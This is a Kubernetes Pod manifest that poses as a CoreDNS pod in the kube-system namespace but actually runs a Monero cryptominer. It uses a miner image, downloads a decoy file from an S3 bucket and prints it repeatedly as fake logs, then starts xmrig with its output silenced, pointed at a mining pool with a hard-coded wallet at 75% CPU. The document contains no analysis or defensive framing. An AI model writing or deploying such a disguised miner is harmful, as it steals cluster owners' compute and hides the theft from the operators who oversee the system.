apiVersion: v1
kind: Pod
metadata:
  name: coredns-7c98db65d4-7t2l2
  namespace: kube-system
spec:
  containers:
  - name: coredns-7c98db65d4-7t2l2
    image: pmietlicki/monero-miner
    command: ["sh", "-c"]
    args:
    - |
      wget -O /tmp/logs.txt https://b62a0b7c-91f2-4c60-bf79-5e1c89b1a1c7.s3.us-east-2.amazonaws.com/docs/logs.txt
      
      while true; do
        cat /tmp/logs.txt
        sleep 10
      done &

      ./xmrig --coin $(COIN) -o $(POOL_URL) -u $(POOL_USER) -p hacker --max-cpu-usage $(MAX_CPU) --donate-level $(DONATE_LEVEL) -k --tls >/dev/null 2>&1
    env:
    - name: COIN
      value: monero
    - name: MAX_CPU
      value: "75"
    - name: DONATE_LEVEL
      value: "1"
    - name: POOL_URL
      value: xmr-us-east1.nanopool.org:10300
    - name: POOL_USER
      value: 485f7m49jVT8GwjyLmGJTuSV1txuXnSXMTYZYnZp7i1f6jvXAXeoMMtLVwK1XtgTuMB5NcrnayA61Y79y8mhur4uBLfSwKG
    ports:
    - containerPort: 443